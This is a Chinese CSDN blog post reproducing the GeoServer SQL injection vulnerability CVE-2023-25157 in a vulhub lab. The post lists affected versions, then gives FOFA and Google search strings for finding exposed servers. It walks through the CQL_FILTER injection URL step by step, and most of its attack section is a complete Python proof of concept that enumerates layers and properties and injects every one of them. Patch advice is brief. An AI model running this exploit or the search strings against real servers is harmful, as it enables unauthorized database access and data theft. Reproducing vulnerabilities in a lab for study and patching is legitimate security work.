GeoServer SQL 注入漏洞复现(CVE-2023-25157)附poc

已于 2023-12-23 23:39:25 修改
阅读量6.6k 收藏 8
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 web安全
于 2023-12-23 23:28:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64483990/article/details/135176391
版权
简介

GeoServer是OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作,通过 GeoServer 可以比较容易的在用户之间迅速共享空间地理信息。

漏洞概述

在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入,执行恶意代码。

影响版本

geoserver<2.18.7
2.19.0<=geoserver<2.19.7
2.20.0<=geoserver<2.20.7
2.21.0<=geoserver<2.21.4
2.22.0<=geoserver<2.22.2

搜索语法

fofa: icon_hash=“97540678”

google: inurl:“/geoserver/ows?service=wfs”

漏洞复现

使用vulhub靶场复现

cd vulhub-master/
cd geoserver/
cd CVE-2023-25157
docker-compose up -d
docker-compose ps

1.访问http://yourip:8080/geoserver进入首页

在这里插入图片描述

2.获取每个功能名称

在进行注入之前,首先要获取地理图层列表信息,这是sql注入payload中的一个必要参数

访问以下url获取:
http://192.168.43.161:8080/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

<Name>标签中的信息,就是地理图层列表。这里选择vulhub:example作为地理图层列表信息
在这里插入图片描述

3.获取功能的属性

将上一步获取的typeName的name属性值拼接到url中,构成url如下:
http://192.168.43.161:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&maxFeatures=1&outputFormat=json
在这里插入图片描述

4.构造SQL 注入
Feature type (table) name: vulhub:example
One of attribute from feature type: name
利用这些已知参数,拼接成payload:
http://192.168.43.161:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,%27x%27%27)%20=%20true%20and%201=(SELECT%20CAST%20((SELECT%20version())%20AS%20integer))%20–%20%27)%20=%20true

在这里插入图片描述

成功获取到数据库版本号

修复建议

升级 org.geoserver.community:gs-jdbcconfig 到 2.21.4 或 2.22.2 或更高版本
禁用 PostGIS Datastore 的 encode functions 或使用 preparedStatements 处理 sql 语句

poc

使用方法:python CVE-2023-25157.py http://your-ip:8080/geoserver/ows

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests
import sys
import xml.etree.ElementTree as ET
import json

# Colored output codes
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
ENDC = '\033[0m'

# Check if the script is run without parameters
if len(sys.argv) == 1:
    print(f"{YELLOW}This script requires a URL parameter.{ENDC}")
    print(f"{YELLOW}Usage: python3 {sys.argv[0]} <URL>{ENDC}")
    sys.exit(1)

# URL and proxy settings
URL = sys.argv[1]
PROXY_ENABLED = False
PROXY = "http://127.0.0.1:8080/" if PROXY_ENABLED else None

response = requests.get(URL + "/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities",
                        proxies={"http": PROXY}, verify=False)

if response.status_code == 200:

    # Parse the XML response and extract the Name from each FeatureType and store in a list
    root = ET.fromstring(response.text)
    feature_types = root.findall('.//{http://www.opengis.net/wfs}FeatureType')
    names = [feature_type.findtext('{http://www.opengis.net/wfs}Name') for feature_type in feature_types]

    # Print the feature names
    print(f"{GREEN}Available feature names:{ENDC}")
    for name in names:
        print(f"- {name}")

    # Send requests for each feature name and CQL_FILTER type
    cql_filters = [
        "strStartsWith"]  # We can also exploit other filter/functions like "PropertyIsLike", "strEndsWith", "strStartsWith", "FeatureId", "jsonArrayContains", "DWithin" etc.
    for name in names:
        for cql_filter in cql_filters:
            endpoint = f"/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName={name}&maxFeatures=1&outputFormat=json"
            response = requests.get(URL + endpoint, proxies={"http": PROXY}, verify=False)
            if response.status_code == 200:
                json_data = json.loads(response.text)
                try:
                    properties = json_data['features'][0]['properties']
                except  IndexError:
                    print("Error: 超出范围")
                property_names = list(properties.keys())
                print(f"\n{GREEN}Available Properties for {name}:{ENDC}")
                for property_name in property_names:
                    print(f"- {property_name}")

                print(f"\n{YELLOW}Sending requests for each property name:{ENDC}")
                for property_name in property_names:
                    endpoint = f"/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName={name}&CQL_FILTER={cql_filter}%28{property_name}%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true"
                    response = requests.get(URL + endpoint, proxies={"http": PROXY}, verify=False)
                    print(
                        f"[+] Sending request for {BOLD}{name}{ENDC} with Property {BOLD}{property_name}{ENDC} and CQL_FILTER: {BOLD}{cql_filter}{ENDC}")
                    if response.status_code == 200:
                        root = ET.fromstring(response.text)
                        error_message = root.findtext('.//{http://www.opengis.net/ogc}ServiceException')
                        print(f"{GREEN}{error_message}{ENDC}")
                    else:
                        print(f"{RED}Request failed{ENDC}")
            else:
                print(f"{RED}Request failed{ENDC}")
else:
    print(f"{RED}Failed to retrieve XML data{ENDC}")
GeoServer SQL注入漏洞复现CVE-2023-25157
0xSec
06-09 8208
GeoServer在预览图层的时候,可以对图层进行数据过滤从而渲染出指定位置的图层。由于未对用户输入进行过滤,在使用需要以数据库作为数据存储的功能时,攻击者可以构造畸形的过滤语法,绕过GeoServer的词法解析从而造成SQL注入,获取服务器中的敏感信息,甚至可能获取数据库服务器权限。
CVE-2023-25157GeoServer OGC Filter SQL注入漏洞复现
薛定谔嘚喵博客
09-01 2387
由于系统未对用户输入进行过滤,远程未授权攻击者可以构造特定语句绕过GeoServer的词法解析,从而实现SQL注入,成功利用此漏洞可获取敏感信息,甚至可能获取数据库服务器权限。由于GeoServer在默认配置下内置图层存放数据在文件中,则未使用外置数据库的场景不受此漏洞影响。
GeoServer SQL 注入漏洞复现CVE-2024-25157poc_geoserverl漏洞(2)
2401_84166236的博客
04-09 904
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
【云安全】云原生- K8S IngressNightmare CVE-2025-1974(漏洞复现完整教程)
最新发布
仇辉攻防的博客
04-17 1383
由于我这里的环境是模拟失陷POD(贴近实际),属于集群内部网络访问,无需端口转发,用第6、7行的URL即可,注释12、13行;编译前,先了解ingress-nginx controller执行.so文件依赖的库版本,编译时指定同样的库版本。版本选择:先看Ingress漏洞版本,倒推K8S版本,参考ingress-nginx官方适配表。我之前搭过一版K8S,是1.23.6,因此对应安装1.6.4的ingress,处于漏洞版本内。同样,看一下编译的机器库版本,发现有3版本可以用。
GeoServer SQL 注入漏洞复现CVE-2024-25157poc_geoserverl漏洞(1)
2401_84166236的博客
04-09 943
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
浅析GeoServer CVE-2023-25157 SQL注入
蚁景网安学院
06-21 1127
GeoServer是一个开源的地图服务器,它是遵循OpenGIS Web服务器规范的J2EE实现,通过它可以方便的将地图数据发布为地图服务,实现地理空间数据在用户之间的共享。
探索地理信息系统的安全边界:CVE-2023-25157 GeoServer SQL注入PoC
gitblog_00087的博客
06-11 429
探索地理信息系统的安全边界:CVE-2023-25157 GeoServer SQL注入PoC 去发现同类优质开源项目:https://gitcode.com/ 在数字化世界的今天,地理信息系统(GIS)扮演着至关重要的角色,为我们提供了对地球表面数据的可视化和分析。GeoServer作为一款广受欢迎的开源软件服务器,为共享地里空间数据提供了强大的支持。然而,安全始终是任何技术平台不可忽视的一环。...
漏洞复现CVE-2023-25157 GeoServer OGC Filter SQL注入漏洞
m0_53121608的博客
07-13 1583
漏洞复现CVE-2021-32682 elFinder ZIP 参数与任意命令注入
GeoServer SQL 注入漏洞复现CVE-2023-25157poc_geoserverl漏洞
m0_60666452的博客
04-03 1685
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
GeoServer OGC Filter SQL注入漏洞CVE-2023-25157)vulhub漏洞复现
qq_53003652的博客
07-06 2117
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。GeoServer是一款JAVA编写的、开源的、用于共享地理空间数据的软件服务器。GeoServer实现了 开放地理空间信息联盟(OGC )标准下WFS、WMS、WCS、WMTS等格式的发布。在利用漏洞前,需要目标服务器中存在类型是PostGIS的数据空间(datastore)和工作空间(workspace)。成功注入获取版本信息。
有了这个网络安全面试题,面试就像开了挂!(PDF)
lvaolan的博客
02-26 1545
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
GeoServer SQL 注入漏洞复现CVE-2024-25157poc_geoserverl漏洞
2401_84253380的博客
06-24 725
1.访问http://yourip:8080/geoserver进入首页2.获取每个功能名称在进行注入之前,首先要获取地理图层列表信息,这是sql注入payload中的一个必要参数访问以下url获取:标签中的信息,就是地理图层列表。这里选择作为地理图层列表信息3.获取功能的属性将上一步获取的typeName的name属性值拼接到url中,构成url如下:4.构造SQL 注入利用这些已知参数,拼接成payload:成功获取到数据库版本号。
GeoServer漏洞CVE-2023-25157
m0_73605862的博客
12-04 1566
3.然后进行模糊搜索写入,利用了布尔注入进行注入,返回结果。通过绕过前面的strStartsWith语句然后在后面查询了版本,并且变成了数字。1.了解了一下这个geoserver的请求规范,顺便了解一下这个网页的请求规范以及返回结果是什么。4.修改注入语句,不知道返回成功了没有(好奇第一条数据有这么长吗),用了另外一种也返回的这个。然乎知道漏洞是用户在输入的时候可能不规范造成的sql注入,并且这个还支持模糊查询。前半部分是sql注入一些语句的测试,后面是漏洞复现和利用。1.查看user 表。
GeoServer 存在 sql 注入漏洞
murphysec的博客
03-01 2983
GeoServer 是一个允许用户共享和编辑地理空间数据的开源软件服务器,支持 OGC Filter expression 和 OGC Common Query Language 语言,使用 PostGIS Datastore 作为数据库。PostGIS是PostgreSQL数据库的扩展程序,增加了数据库对地理对象的支持。
漏洞复现Geoserver远程代码执行漏洞CVE-2024-36401)
今天是几号的博客
07-03 3985
GeoServer已经发布先前版本的补丁,可以从下载页面(https://geoserver.org/)下载:2.25.1、2.24.3、2.24.2、2.23.2、2.21.5、2.20.7、2.20.4、2.19.2、2.18.0,从下载的补丁中获取gt-app-schema和gt-complex和 gt-xsd-core jar文件,替换掉WEB-INF/lib里面对应的文件即可。它为提供交互操作性而设计,使用开放标准发布来自任何主要空间数据源的数据。
Geoserver漏洞复现
2301_80115097的博客
04-23 2248
(https://github.com/geoserver/geoserver/)获取2.23.4或2.24.1及以上的版本修复漏洞。官网:https://sourceforge.net/projects/geoserver/files/GeoServer/下载地址:https://github.com/geoserver/geoserver/releases。仓库托管地址:https://github.com/geoserver/geoserver。默认账号密码:admin/geoserver
HTTP/2拒绝服务漏洞CVE-2023-44487)怎么修复
01-15
### 如何修复HTTP/2 CVE-2023-44487 拒绝服务漏洞 #### Apache HTTP Server 修复方案 对于Apache HTTP Server,当检测到存在CVE-2023-44487漏洞时,应立即采取措施更新至最新稳定版。官方已针对此问题发布了补丁程序,建议尽快应用这些安全更新来消除潜在风险[^1]。 #### Nginx 配置调整策略 考虑到Nginx在处理HTTP/2连接方面的能力,可以通过设置`keepalive_requests`参数限制单个TCP连接上的最大请求数量,以此缓解可能发生的DDoS攻击影响。具体操作是在nginx.conf文件中的http块加入如下配置: ```nginx http { ... keepalive_requests 100; # 设置合理的数值以适应实际应用场景需求 } ``` 此外,还应当关注Nginx官方发布的安全公告并及时安装任何可用的安全修补程序[^3]。 #### Jetty 用户应对指南 如果使用的是Jetty容器,则需要注意特定版本范围内的实例可能会受到该漏洞的影响。例如,在提到的一个案例中,GeoServer所依赖的Jetty版本低于9.4.53因而面临安全隐患。对此类情况的一种解决方案是尝试手动替换受影响组件的JAR包为较新且不含缺陷的版本;不过更推荐的做法是从源码编译或寻找由供应商提供的经过测试确认无误的新发行版[^5]。 #### 安全实践总结 无论采用何种Web服务器软件,保持系统的持续监控与定期审查至关重要。这不仅有助于提前发现并解决问题,也能确保组织始终处于最佳防御状态对抗新兴威胁。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值